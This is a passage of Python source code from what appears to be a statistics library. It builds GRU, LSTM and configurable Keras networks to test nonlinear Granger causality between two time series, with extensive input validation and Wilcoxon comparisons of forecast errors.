xtest=x
else:
raise TypeError('xtest should be numpy ndarray, or [].')
# Checking the z test data correctness
if type(ztest) is np.ndarray:
if np.array(ztest.shape).shape[0] != 2:
raise Exception('ztest has wrong shape.')
if ztest.shape[0] != xtest.shape[0]:
raise Exception('ztest should have the same length as xtest.')
elif True in np.isnan(ztest):
raise ValueError('There is some NaN in ztest.')
elif True in np.isinf(ztest):
raise ValueError('There is some infinity value in ztest.')
elif len(z)>0 and ztest==[] and isxtest==False:
ztest=z
elif len(z)>0 and ztest==[] and isxtest==True:
raise Exception('ztest should be set if xtest is set.')
elif ztest != [] :
raise TypeError('ztest should be numpy ndarray, or [].')
# Checking if add_Dropout has correct type
if type(add_Dropout) is not bool:
raise TypeError('add_Dropout should be boolean.')
# Checking if Dropout_rate has correct type and value
if type(Dropout_rate) is not float:
raise TypeError('Dropout_rate should be float.')
else:
if Dropout_rate<0.0 or Dropout_rate>=1.0:
raise ValueError('Dropout_rate should be in the range [0, 1).')
# Checking if epochs_num has correct type and value
if type(epochs_num) is not int and type(epochs_num) is not list:
raise TypeError('epochs_num should be a positive integer or a list of positive integers.')
elif type(epochs_num) is int:
if epochs_num<=0:
raise ValueError('epochs_num should be a positive integer or a list of positive integers.')
else:
epochs_num=[epochs_num]
if type(learning_rate) is list:
raise TypeError('If epochs_num is an int, then learning_rate should also be an int or float, not a list.')
elif type(epochs_num) is list:
for e in epochs_num:
if type(e) is not int:
raise TypeError('epochs_num should be a positive integer or a list of positive integers.')
elif e<=0:
raise ValueError('epochs_num should be a positive integer or a list of positive integers.')
if type(learning_rate) is not list:
raise TypeError('If epochs_num is a list, then learning_rate also should be a list.')
# Checking if learning_rate has correct type and value
if type(learning_rate) is not int and type(learning_rate) is not float and type(learning_rate) is not list:
raise TypeError('learning_rate should be a positive integer or float, or a list of positive integers or floats.')
elif type(learning_rate) is int or type(learning_rate) is float:
if learning_rate<=0:
raise ValueError('learning_rate should be a positive integer or float, or a list of positive integers or floats.')
else:
learning_rate=[learning_rate]
elif type(learning_rate) is list:
for lr in learning_rate:
if type(lr) is not int and type(lr) is not float:
raise TypeError('learning_rate should be a positive integer or float, or a list of positive integers or floats.')
elif lr<=0:
raise ValueError('learning_rate should be a positive integer or float, or a list of positive integers or floats.')
if type(epochs_num) is not list:
raise TypeError('If learning_rate is a list, then epochs_num also should be a list.')
# Checking if batch_size_num has correct type and value
if type(batch_size_num) is not int:
raise TypeError('batch_size_num should be a positive integer.')
elif type(batch_size_num) is int:
if batch_size_num<=0:
raise ValueError('batch_size_num should be a positive integer.')
# Checking if verbose has correct type
if type(verbose) is not bool:
raise TypeError('verbose should be boolean.')
# Checking if plot has correct type
if type(plot) is not bool:
raise TypeError('plot should be boolean.')
# Number of samples in each time series
length = x.shape[0]
testlength = xtest.shape[0]
results = dict()
# Creating GRU neural network models and testing for causality for every lag specified by maxlag
for lag in lags:
X = x[lag:,0] # signal that will be forecast
Xtest = xtest[lag:,0]
# input data for model based only on X (and z if set)
if len(z)>0:
xz= np.concatenate((z,x[:,0].reshape(x.shape[0],1)),axis=1)
dataX = np.zeros([x.shape[0]-lag,lag,xz.shape[1]]) # input matrix for training the model only with data from X time series
for i in range(length-lag):
dataX[i,:,:]=xz[i:i+lag,:] # each row is lag number of values before the value in corresponding row in X
else:
dataX = np.zeros([x.shape[0]-lag,lag]) # input matrix for training the model only with data from X time series
for i in range(length-lag):
dataX[i,:]=x[i:i+lag,0] # each row is lag number of values before the value in corresponding row in X
dataX = dataX.reshape(dataX.shape[0],dataX.shape[1],1) # reshaping the data to meet the requirements of the model
# input data for model based on X and Y (and z if set)
if len(z)>0:
xz= np.concatenate((z,x),axis=1)
else:
xz=x
dataXY = np.zeros([xz.shape[0]-lag,lag,xz.shape[1]]) # input matrix for training the model with data from X and Y time series
for i in range(length-lag):
dataXY[i,:,:] = xz[i:i+lag,:] # in each row there is lag number of values of X and lag number of values of Y before the value in corresponding row in X
# test data for model based only on X (and z if set)
if len(z)>0:
xztest= np.concatenate((ztest,xtest[:,0].reshape(xtest.shape[0],1)),axis=1)
dataXtest = np.zeros([xztest.shape[0]-lag,lag,xztest.shape[1]]) # input matrix for testing the model only with data from X time series
for i in range(testlength-lag):
dataXtest[i,:,:]=xztest[i:i+lag,:] # each row is lag number of values before the value in corresponding row in X
else:
dataXtest = np.zeros([xtest.shape[0]-lag,lag]) # input matrix for testing the model only with data from X time series
for i in range(xtest.shape[0]-lag):
dataXtest[i,:]=xtest[i:i+lag,0] # each row is lag number of values before the value in corresponding row in X
dataXtest = dataXtest.reshape(dataXtest.shape[0],dataXtest.shape[1],1) # reshaping the data to meet the requirements of the model
# test data for model based on X and Y (and z if set)
if len(z)>0:
xztest= np.concatenate((ztest,xtest),axis=1)
else:
xztest=xtest
dataXYtest = np.zeros([xztest.shape[0]-lag,lag,xztest.shape[1]]) # input matrix for testing the model with data from X and Y time series
for i in range(testlength-lag):
dataXYtest[i,:,:] = xztest[i:i+lag,:] # in each row there is lag number of values of X and lag number of values of Y before the value in corresponding row in X
modelX = {}
modelXY = {}
RSSX = []
RSSXY = []
historyX = {}
historyXY = {}
for r in range(run):
modelX[r] = Sequential() # creating Sequential model, which will use only data from X time series to forecast X.
historyX[r] = []
historyXY[r] = []
if GRU_layers == 1: # If there is only one GRU layer, then return_sequences should be False
modelX[r].add(GRU(GRU_neurons[0],input_shape=(dataX.shape[1],dataX.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
else: # For many GRU layers return_sequences should be True, to connect the layers with each other
modelX[r].add(GRU(GRU_neurons[0],input_shape=(dataX.shape[1],dataX.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = True))
if add_Dropout: # adding Dropout
modelX[r].add(Dropout(Dropout_rate))
for grul in range(1,GRU_layers): # adding next GRU layers
if grul == GRU_layers-1: # the last GRU layer should not return sequences
modelX[r].add(GRU(GRU_neurons[grul],input_shape=(GRU_neurons[grul-1],1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
else: # intermediate GRU layers have to return sequences for stacking
modelX[r].add(GRU(GRU_neurons[grul],input_shape=(GRU_neurons[grul-1],1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = True))
if add_Dropout: # adding Dropout
modelX[r].add(Dropout(Dropout_rate))
for densel in range(Dense_layers): # adding Dense layers if asked
modelX[r].add(Dense(Dense_neurons[densel],activation = 'relu'))
if add_Dropout: # adding Dropout
modelX[r].add(Dropout(Dropout_rate))
modelX[r].add(Dense(1,activation = 'linear')) # adding output layer
modelXY[r] = Sequential()# creating Sequential model, which will use data from X and Y time series to forecast X.
if GRU_layers == 1: # If there is only one GRU layer, then return_sequences should be False
modelXY[r].add(GRU(GRU_neurons[0],input_shape=(dataXY.shape[1],dataXY.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
else: # For many GRU layers return_sequences should be True, to connect the layers with each other
modelXY[r].add(GRU(GRU_neurons[0],input_shape=(dataXY.shape[1],dataXY.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = True))
if add_Dropout: # adding Dropout
modelXY[r].add(Dropout(Dropout_rate))
for grul in range(1,GRU_layers): # adding next GRU layers
if grul == GRU_layers-1: # the last GRU layer should not return sequences
modelXY[r].add(GRU(GRU_neurons[grul],input_shape=(GRU_neurons[grul-1],1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
else: # intermediate GRU layers have to return sequences for stacking
modelXY[r].add(GRU(GRU_neurons[grul],input_shape=(GRU_neurons[grul-1],1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = True))
if add_Dropout: # adding Dropout
modelXY[r].add(Dropout(Dropout_rate))
for densel in range(Dense_layers): # adding Dense layers if asked
modelXY[r].add(Dense(Dense_neurons[densel],activation = 'relu'))
if add_Dropout: # adding Dropout
modelXY[r].add(Dropout(Dropout_rate))
modelXY[r].add(Dense(1,activation = 'linear')) # adding output layer
for i, e in enumerate(epochs_num):
opt = keras.optimizers.Adam(learning_rate=learning_rate[i])
modelX[r].compile(optimizer=opt,
loss='mean_squared_error',
metrics=['mse'])
historyX[r].append(modelX[r].fit(dataX, X, epochs = e, batch_size = batch_size_num, verbose = verbose))
modelXY[r].compile(optimizer=opt,
loss='mean_squared_error',
metrics=['mse'])
historyXY[r].append(modelXY[r].fit(dataXY, X, epochs = e, batch_size = batch_size_num, verbose = verbose))
XpredX = modelX[r].predict(dataXtest) # prediction of X based on past of X
XpredX = XpredX.reshape(XpredX.size)
errorX = Xtest-XpredX
XYpredX = modelXY[r].predict(dataXYtest) # forecasting X based on the past of X and Y
XYpredX = XYpredX.reshape(XYpredX.size)
errorXY = Xtest-XYpredX
RSSX.append(sum(errorX**2))
RSSXY.append(sum(errorXY**2))
idx_bestX = RSSX.index(min(RSSX))
idx_bestXY = RSSXY.index(min(RSSXY))
best_modelX = modelX[idx_bestX]
best_modelXY = modelXY[idx_bestXY]
# Testing whether the model including both X and Y has statistically smaller forecast errors
# Wilcoxon signed-rank test (one-sided: |errors of the X-only model| greater than |errors of the X and Y model|)
XpredX = best_modelX.predict(dataXtest)
XpredX = XpredX.reshape(XpredX.size)
XYpredX = best_modelXY.predict(dataXYtest)
XYpredX = XYpredX.reshape(XYpredX.size)
errorX = Xtest-XpredX
errorXY = Xtest-XYpredX
S, p_value = stats.wilcoxon(np.abs(errorX),np.abs(errorXY),alternative='greater')
# Printing the tests results and plotting effects of forecasting
print("Statistics value =", S,"p-value =", p_value)
if plot:
XpredX = best_modelX.predict(dataXtest)
XYpredX = best_modelXY.predict(dataXYtest)
plt.figure(figsize=(10,7))
plt.plot(Xtest)
plt.plot(XpredX)
plt.plot(XYpredX)
plt.legend(['X','Pred. based on X','Pred. based on X and Y'])
plt.xlabel('Number of sample')
plt.ylabel('Predicted value')
plt.title('Lags:'+str(lag))
plt.show()
test_results = {"Wilcoxon test": ([S, p_value],['Statistics value', 'p-value'])}
results[lag] = ([test_results, modelX, modelXY, historyX, historyXY,
RSSX, RSSXY, idx_bestX, idx_bestXY, errorX, errorXY],
['test results','models based on X', 'models based on X and Y',
'history of fitting models based on X', 'history of fitting models based on X and Y',
'RSS of models based only on X', 'RSS of models based on X and Y',
'index of the best model based on X', 'index of the best model based on X and Y',
'errors from model based on X','errors from model based on X and Y'])
return results
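# A hedged helper sketch (the name _collect_wilcoxon_pvalues is not part of the
# original API): extracts the Wilcoxon p-value for every lag from the results
# dictionary returned by nonlincausalityGRU above (nonlincausalityLSTM returns
# the same structure).
def _collect_wilcoxon_pvalues(results):
    '''Return a {lag: p_value} dict from a nonlincausality* results dictionary.'''
    pvals = {}
    for lag, (values, labels) in results.items():
        test_results = values[0]          # first element of the list: test results
        stat_and_p, names = test_results["Wilcoxon test"]
        pvals[lag] = stat_and_p[1]        # stat_and_p is [S, p_value]
    return pvals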
#%% NN
def nonlincausalityNN(x, maxlag, NN_config, NN_neurons, run=1, xtest=[], z=[], ztest=[], epochs_num=100, learning_rate=0.01, batch_size_num=32, verbose = True, plot = False):
'''
This function is an implementation of a modified Granger causality test. Classical Granger causality uses linear autoregression for testing causality;
in this function the forecasting is made using a neural network with a configurable architecture.
Parameters
----------
x - numpy ndarray, where each column corresponds to one time series.
maxlag - int, list, tuple or numpy ndarray. If maxlag is int, then test for causality is made for lags from 1 to maxlag.
If maxlag is list, tuple or numpy ndarray, then test for causality is made for every number of lags in maxlag.
NN_config - list, tuple or numpy ndarray. Specified subsequent layers of the neural network. List should contain only 'd', 'l', 'g' or 'dr':
'd' - Dense layer
'l' - LSTM layer
'g' - GRU layer
'dr' - Dropout layer
NN_neurons - list, tuple or numpy ndarray, where the number of elements should be equal to the number of layers in NN_config. Each value corresponds to the number of neurons in a Dense, LSTM or GRU layer, or to the rate of a Dropout layer.
E.g. if NN_config = ['l','dr','d'] and NN_neurons = [100, 0.1, 30], then the first layer is an LSTM layer with 100 neurons, followed by a Dropout layer with rate 0.1 and then a Dense layer with 30 neurons.
The last layer is always a Dense layer with one neuron and a linear activation function.
run - int, determines how many times a given neural network architecture will be trained, in order to select the model that has found the best minimum of the cost function.
xtest - numpy ndarray, where each column corresponds to one time series, as in the variable x. This data will be used for testing hypothesis.
z - numpy ndarray (or [] if not applied), where each column corresponds to one time series. This variable is for testing conditional causality.
In this approach, the first model is forecasting the present value of X based on past values of X and z, while the second model is forecasting the same value based on the past of X, Y and z.
ztest - numpy ndarray (or [] if not applied), where each column corresponds to one time series, as in the variable z. This data will be used for testing hypothesis.
epochs_num - int or list, number of epochs used for fitting the model. If a list, then its length should be equal to the number of different learning rates used.
learning_rate - float or list, the applied learning rate(s) for the training process. If a list, then its length should be equal to the length of the epochs_num list.
batch_size_num - int, number of batch size for fitting the model.
verbose - boolean, if True, then results are shown after each lag.
plot - boolean, if True plots of original and predicted values are made after each lag.
Returns
-------
results - dictionary keyed by the number of lags used. Each key stores a list, which contains the test results, the models for prediction of X fitted only on the X time series,
the models for prediction of X fitted on the X and Y time series, the histories of fitting the first and the second models, the RSS of models based only on X, the RSS of models based on X and Y,
the index of the best model based on X, the index of the best model based on X and Y, and the errors from the best models based on X and on X and Y.
------
Example 1.
NN_config = ['l','dr','d'], NN_neurons = [100, 0.1, 30]
Used model:
LSTM layer(100 neurons) -> Dropout layer (rate = 0.1) -> Dense layer(30 neurons) -> Dense layer(1 neuron)
Example 2.
NN_config = ['g','d','dr','l'], NN_neurons = [50, 40, 0.2, 20]
Used model:
GRU layer(50 neurons) -> Dense layer(40 neurons) -> Dropout layer(rate =0.2) -> LSTM layer(20 neurons) -> Dense layer(1 neuron)
'''
# Checking the data correctness
if type(x) is np.ndarray:
if np.array(x.shape).shape[0] !=2:
raise Exception('x has wrong shape.')
elif x.shape[1] !=2:
raise Exception('x should have 2 columns.')
elif True in np.isnan(x):
raise ValueError('There is some NaN in x.')
elif True in np.isinf(x):
raise ValueError('There is some infinity value in x.')
else:
raise TypeError('x should be numpy ndarray.')
# Checking if maxlag has correct type and values
if type(maxlag) is list or type(maxlag) is np.ndarray or type(maxlag) is tuple:
lags = maxlag
for lag in lags:
if type(lag) is not int:
raise ValueError('Every element in maxlag should be a positive integer.')
elif lag<=0:
raise ValueError('Every element in maxlag should be a positive integer.')
elif type(maxlag) is int:
if maxlag>0:
lags = range(1,maxlag+1)
else:
raise ValueError('maxlag should be greater than 0.')
else:
raise TypeError('maxlag should be int, list, tuple or numpy ndarray.')
# Checking if NN_config has correct type and values
if type(NN_config) is not np.ndarray and type(NN_config) is not list and type(NN_config) is not tuple:
raise TypeError('NN_config should be list, tuple or numpy array.')
elif len(NN_config)==0:
raise ValueError('NN_config can not be empty.')
else:
for n in NN_config:
if n == 'd' or n == 'l' or n =='g' or n == 'dr':
continue
else:
raise ValueError("Elements in NN_config should be equal to 'd' for Dense, 'l' for LSTM, 'g' for GRU or 'dr' for Dropout.")
# Checking if NN_neurons has correct type and values
if type(NN_neurons) is not np.ndarray and type(NN_neurons) is not list and type(NN_neurons) is not tuple:
raise TypeError('NN_neurons should be list, tuple or numpy array.')
elif len(NN_neurons)==0:
raise Exception('NN_neurons can not be empty.')
elif len(NN_neurons) != len(NN_config):
raise Exception('NN_neurons should have the same number of elements as NN_config.')
else:
for i, n in enumerate(NN_neurons):
if type(n) is not int and NN_config[i] !='dr' or NN_config[i] =='dr' and type(n) is not float:
raise TypeError('Every element in NN_neurons should be a positive integer or a float between 0 and 1 for Dropout layer.')
elif NN_config[i] =='dr' and n>=1.0:
raise ValueError('Value for Dropout layer should be float between 0 and 1.')
elif n<=0:
raise ValueError('Every element in NN_neurons should be a positive integer or a float between 0 and 1 for Dropout layer.')
# Checking if run has correct type and value
if type(run) is not int:
raise TypeError('run should be an integer.')
elif run<=0:
raise ValueError('run should be a positive integer.')
# Checking the test data correctness
isxtest = False
if type(xtest) is np.ndarray:
if np.array(xtest.shape).shape[0] !=2:
raise Exception('xtest has wrong shape.')
elif xtest.shape[1] !=2:
raise Exception('xtest should have 2 columns.')
elif True in np.isnan(xtest):
raise ValueError('There is some NaN in xtest.')
elif True in np.isinf(xtest):
raise ValueError('There is some infinity value in xtest.')
else:
isxtest = True
elif xtest==[]:
xtest=x
else:
raise TypeError('xtest should be numpy ndarray, or [].')
# Checking if z has correct type and values
if type(z) is np.ndarray:
if np.array(z.shape).shape[0] != 2:
raise Exception('z has wrong shape.')
elif z.shape[0] != x.shape[0]:
raise Exception('z should have the same length as x.')
elif True in np.isnan(z):
raise ValueError('There is some NaN in z.')
elif True in np.isinf(z):
raise ValueError('There is some infinity value in z.')
elif z != []:
raise TypeError('z should be numpy ndarray or [].')
# Checking the z test data correctness
if type(ztest) is np.ndarray:
if np.array(ztest.shape).shape[0] != 2:
raise Exception('ztest has wrong shape.')
if ztest.shape[0] != xtest.shape[0]:
raise Exception('ztest should have the same length as xtest.')
elif True in np.isnan(ztest):
raise ValueError('There is some NaN in ztest.')
elif True in np.isinf(ztest):
raise ValueError('There is some infinity value in ztest.')
elif len(z)>0 and ztest==[] and isxtest==False:
ztest=z
elif len(z)>0 and ztest==[] and isxtest==True:
raise Exception('ztest should be set if xtest is set.')
elif ztest != []:
raise TypeError('ztest should be numpy ndarray, or [].')
# Checking if epochs_num has correct type and value
if type(epochs_num) is not int and type(epochs_num) is not list:
raise TypeError('epochs_num should be a positive integer or a list of positive integers.')
elif type(epochs_num) is int:
if epochs_num<=0:
raise ValueError('epochs_num should be a positive integer or a list of positive integers.')
else:
epochs_num=[epochs_num]
if type(learning_rate) is list:
raise TypeError('If epochs_num is an int, then learning_rate should also be an int or float, not a list.')
elif type(epochs_num) is list:
for e in epochs_num:
if type(e) is not int:
raise TypeError('epochs_num should be a positive integer or a list of positive integers.')
elif e<=0:
raise ValueError('epochs_num should be a positive integer or a list of positive integers.')
if type(learning_rate) is not list:
raise TypeError('If epochs_num is a list, then learning_rate also should be a list.')
# Checking if learning_rate has correct type and value
if type(learning_rate) is not int and type(learning_rate) is not float and type(learning_rate) is not list:
raise TypeError('learning_rate should be a positive integer or float, or a list of positive integers or floats.')
elif type(learning_rate) is int or type(learning_rate) is float:
if learning_rate<=0:
raise ValueError('learning_rate should be a positive integer or float, or a list of positive integers or floats.')
else:
learning_rate=[learning_rate]
elif type(learning_rate) is list:
for lr in learning_rate:
if type(lr) is not int and type(lr) is not float:
raise TypeError('learning_rate should be a positive integer or float, or a list of positive integers or floats.')
elif lr<=0:
raise ValueError('learning_rate should be a positive integer or float, or a list of positive integers or floats.')
if type(epochs_num) is not list:
raise TypeError('If learning_rate is a list, then epochs_num also should be a list.')
# Checking if batch_size_num has correct type and value
if type(batch_size_num) is not int and not np.isnan(batch_size_num) :
raise TypeError('batch_size_num should be a positive integer or NaN.')
elif type(batch_size_num) is int:
if batch_size_num<=0:
raise ValueError('batch_size_num should be a positive integer.')
# Checking if verbose has correct type
if type(verbose) is not bool:
raise TypeError('verbose should be boolean.')
# Checking if plot has correct type
if type(plot) is not bool:
raise TypeError('plot should be boolean.')
# Number of samples in each time series
length = x.shape[0]
testlength = xtest.shape[0]
results = dict()
# Creating neural network models and testing for causality for every lag specified by maxlag
for lag in lags:
X = x[lag:,0] # signal that will be forecast
Xtest = xtest[lag:,0]
# input data for model based only on X (and z if set)
if len(z)>0:
xz= np.concatenate((z,x[:,0].reshape(x.shape[0],1)),axis=1)
dataX = np.zeros([x.shape[0]-lag,lag,xz.shape[1]]) # input matrix for training the model only with data from X time series
for i in range(length-lag):
dataX[i,:,:]=xz[i:i+lag,:] # each row is lag number of values before the value in corresponding row in X
else:
dataX = np.zeros([x.shape[0]-lag,lag]) # input matrix for training the model only with data from X time series
for i in range(length-lag):
dataX[i,:]=x[i:i+lag,0] # each row is lag number of values before the value in corresponding row in X
dataX = dataX.reshape(dataX.shape[0],dataX.shape[1],1) # reshaping the data to meet the requirements of the model
# input data for model based on X and Y (and z if set)
if len(z)>0:
xz= np.concatenate((z,x),axis=1)
else:
xz=x
dataXY = np.zeros([xz.shape[0]-lag,lag,xz.shape[1]]) # input matrix for training the model with data from X and Y time series
for i in range(length-lag):
dataXY[i,:,:] = xz[i:i+lag,:] # in each row there is lag number of values of X and lag number of values of Y before the value in corresponding row in X
# test data for model based only on X (and z if set)
if len(z)>0:
xztest= np.concatenate((ztest,xtest[:,0].reshape(xtest.shape[0],1)),axis=1)
dataXtest = np.zeros([xztest.shape[0]-lag,lag,xztest.shape[1]]) # input matrix for testing the model only with data from X time series
for i in range(testlength-lag):
dataXtest[i,:,:]=xztest[i:i+lag,:] # each row is lag number of values before the value in corresponding row in X
else:
dataXtest = np.zeros([xtest.shape[0]-lag,lag]) # input matrix for testing the model only with data from X time series
for i in range(xtest.shape[0]-lag):
dataXtest[i,:]=xtest[i:i+lag,0] # each row is lag number of values before the value in corresponding row in X
dataXtest = dataXtest.reshape(dataXtest.shape[0],dataXtest.shape[1],1) # reshaping the data to meet the requirements of the model
# test data for model based on X and Y (and z if set)
if len(z)>0:
xztest= np.concatenate((ztest,xtest),axis=1)
else:
xztest=xtest
dataXYtest = np.zeros([xztest.shape[0]-lag,lag,xztest.shape[1]]) # input matrix for testing the model with data from X and Y time series
for i in range(testlength-lag):
dataXYtest[i,:,:] = xztest[i:i+lag,:] # in each row there is lag number of values of X and lag number of values of Y before the value in corresponding row in X
modelX = {}
modelXY = {}
RSSX = []
RSSXY = []
historyX = {}
historyXY = {}
for r in range(run):
modelX[r] = Sequential() # Creating Sequential model, which will use only data from X time series to forecast X.
modelXY[r] = Sequential() # Creating Sequential model, which will use data from X and Y time series to forecast X.
historyX[r] = []
historyXY[r] = []
in_shape = dataX.shape[1]
for i, n in enumerate(NN_config):
if n == 'd': # adding Dense layer
if i+1 == len(NN_config): # if it is the last layer
modelX[r].add(Dense(NN_neurons[i], activation = 'relu'))
modelXY[r].add(Dense(NN_neurons[i], activation = 'relu'))
elif ('l' in NN_config[i+1:] or 'g' in NN_config[i+1:]) and i == 0: # if one of the next layers is LSTM or GRU and it is the first layer
modelX[r].add(TimeDistributed(Dense(NN_neurons[i],activation = 'relu'), input_shape = [dataX.shape[1],dataX.shape[2]]))
modelXY[r].add(TimeDistributed(Dense(NN_neurons[i],activation = 'relu'), input_shape = [dataXY.shape[1],dataXY.shape[2]]))
in_shape = NN_neurons[i] # input shape for the next layer
elif 'l' in NN_config[i+1:] or 'g' in NN_config[i+1:]: # if one of the next layers is LSTM or GRU, but it is not the first layer
modelX[r].add(TimeDistributed(Dense(NN_neurons[i],activation = 'relu')))
modelXY[r].add(TimeDistributed(Dense(NN_neurons[i],activation = 'relu')))
in_shape = NN_neurons[i] # input shape for the next layer
elif i==0:
modelX[r].add(Dense(NN_neurons[i], input_shape = [dataX.shape[1], dataX.shape[2]], activation = 'relu')) # TODO changing activation function
modelXY[r].add(Dense(NN_neurons[i], input_shape = [dataXY.shape[1], dataXY.shape[2]], activation = 'relu')) # TODO changing activation function
in_shape = NN_neurons[i] # input shape for the next layer
else:
modelX[r].add(Dense(NN_neurons[i], activation = 'relu')) # TODO changing activation function
modelXY[r].add(Dense(NN_neurons[i], activation = 'relu')) # TODO changing activation function
in_shape = NN_neurons[i] # input shape for the next layer
elif n == 'l': # adding LSTM layer
if i+1 == len(NN_config) and i != 0: # if it is the last layer
modelX[r].add(LSTM(NN_neurons[i],input_shape=(in_shape,1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
modelXY[r].add(LSTM(NN_neurons[i],input_shape=(in_shape,1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
elif i+1 == len(NN_config) and i == 0: # if it is the only layer
modelX[r].add(LSTM(NN_neurons[i],input_shape=(in_shape,dataX.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
modelXY[r].add(LSTM(NN_neurons[i],input_shape=(in_shape,dataXY.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
elif ('l' in NN_config[i+1:] or 'g' in NN_config[i+1:]) and i == 0: # if one of the next layers is LSTM or GRU and it is the first layer
modelX[r].add(LSTM(NN_neurons[i],input_shape=(dataX.shape[1],dataX.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = True))
modelXY[r].add(LSTM(NN_neurons[i],input_shape=(dataXY.shape[1],dataXY.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = True))
in_shape = NN_neurons[i] # input shape for the next layer
elif 'l' in NN_config[i+1:] or 'g' in NN_config[i+1:]: # if one of the next layers is LSTM or GRU, but it is not the first layer
modelX[r].add(LSTM(NN_neurons[i],input_shape=(in_shape,1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = True))
modelXY[r].add(LSTM(NN_neurons[i],input_shape=(in_shape,1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = True))
in_shape = NN_neurons[i] # input shape for the next layer
elif 'l' not in NN_config[i+1:] and 'g' not in NN_config[i+1:] and i == 0: # if none of the next layers is LSTM or GRU and it is the first layer
modelX[r].add(LSTM(NN_neurons[i],input_shape=(dataX.shape[1],dataX.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
modelXY[r].add(LSTM(NN_neurons[i],input_shape=(dataXY.shape[1],dataXY.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
in_shape = NN_neurons[i] # input shape for the next layer
else:
modelX[r].add(LSTM(NN_neurons[i],input_shape=(in_shape,1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
modelXY[r].add(LSTM(NN_neurons[i],input_shape=(in_shape,1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
in_shape = NN_neurons[i] # input shape for the next layer
elif n == 'g': # adding GRU layer
if i+1 == len(NN_config) and i != 0: # if it is the last layer
modelX[r].add(GRU(NN_neurons[i],input_shape=(in_shape,1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
modelXY[r].add(GRU(NN_neurons[i],input_shape=(in_shape,1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
elif i+1 == len(NN_config) and i == 0: # if it is the only layer
modelX[r].add(GRU(NN_neurons[i],input_shape=(in_shape,dataX.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
modelXY[r].add(GRU(NN_neurons[i],input_shape=(in_shape,dataXY.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
elif ('l' in NN_config[i+1:] or 'g' in NN_config[i+1:]) and i == 0: # if one of the next layers is LSTM or GRU and it is the first layer
modelX[r].add(GRU(NN_neurons[i],input_shape=(dataX.shape[1],dataX.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = True))
modelXY[r].add(GRU(NN_neurons[i],input_shape=(dataXY.shape[1],dataXY.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = True))
in_shape = NN_neurons[i] # input shape for the next layer
elif 'l' in NN_config[i+1:] or 'g' in NN_config[i+1:]: # if one of the next layers is LSTM or GRU, but it is not the first layer
modelX[r].add(GRU(NN_neurons[i],input_shape=(in_shape,1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = True))
modelXY[r].add(GRU(NN_neurons[i],input_shape=(in_shape,1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = True))
in_shape = NN_neurons[i] # input shape for the next layer
elif 'l' not in NN_config[i+1:] and 'g' not in NN_config[i+1:] and i == 0: # if none of the next layers is LSTM or GRU and it is the first layer
modelX[r].add(GRU(NN_neurons[i],input_shape=(dataX.shape[1],dataX.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
modelXY[r].add(GRU(NN_neurons[i],input_shape=(dataXY.shape[1],dataXY.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
in_shape = NN_neurons[i] # input shape for the next layer
else:
modelX[r].add(GRU(NN_neurons[i],input_shape=(in_shape,1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
modelXY[r].add(GRU(NN_neurons[i],input_shape=(in_shape,1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
in_shape = NN_neurons[i] # input shape for the next layer
elif n == 'dr':
modelX[r].add(Dropout(NN_neurons[i]))
modelXY[r].add(Dropout(NN_neurons[i]))
if not('l' in NN_config or 'g' in NN_config):
modelX[r].add(Flatten())
modelX[r].add(Dense(1,activation = 'linear')) # adding output layer
if not('l' in NN_config or 'g' in NN_config):
modelXY[r].add(Flatten())
modelXY[r].add(Dense(1,activation = 'linear')) # adding output layer
for i, e in enumerate(epochs_num):
opt = keras.optimizers.Adam(learning_rate=learning_rate[i])
modelX[r].compile(optimizer=opt,
loss='mean_squared_error',
metrics=['mse'])
historyX[r].append(modelX[r].fit(dataX, X, epochs = e, batch_size = batch_size_num, verbose = verbose))
modelXY[r].compile(optimizer=opt,
loss='mean_squared_error',
metrics=['mse'])
historyXY[r].append(modelXY[r].fit(dataXY, X, epochs = e, batch_size = batch_size_num, verbose = verbose))
XpredX = modelX[r].predict(dataXtest) # prediction of X based on past of X
XpredX = XpredX.reshape(XpredX.size)
errorX = Xtest-XpredX
XYpredX = modelXY[r].predict(dataXYtest) # forecasting X based on the past of X and Y
XYpredX = XYpredX.reshape(XYpredX.size)
errorXY = Xtest-XYpredX
RSSX.append(sum(errorX**2))
RSSXY.append(sum(errorXY**2))
idx_bestX = RSSX.index(min(RSSX))
idx_bestXY = RSSXY.index(min(RSSXY))
best_modelX = modelX[idx_bestX]
best_modelXY = modelXY[idx_bestXY]
# Testing whether the model including both X and Y has statistically smaller forecast errors
